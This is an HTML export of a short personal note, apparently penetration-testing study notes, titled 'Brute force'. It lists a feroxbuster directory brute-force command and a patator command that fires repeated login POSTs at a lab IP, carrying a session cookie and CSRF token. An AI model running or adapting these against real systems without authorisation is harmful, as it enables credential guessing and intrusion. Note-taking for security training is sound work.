<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>Brute force</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Brute force</h1>

      <div class="ck-content">
        <p><code>feroxbuster -w &lt;wordlist&gt; -u &lt;url&gt; -e -f -t 100</code>

        </p>
        <p><code>patator http_fuzz method=POST\</code>

          <br /><code>&gt; url="http://10.10.152.149/login.php"\</code>

          <br /><code>&gt; body="username=admin&amp;password=admin&amp;Login=Login&amp;user_token=ac1667e40de7798edf9f2ff8d67f88b1" \</code>

          <br
          /><code>&gt; header="Cookie: PHPSESSID=nn3c0h646jqajqvf81bd5hd23h; security=impossible"\</code>

          <br
          /><code>&gt; -x quit:fgrep!=loginphp</code>

        </p>
        <p>
          <img src="Brute%20force/image.png" />
          <br /> </p>
      </div>
    </div>
  </body>

</html>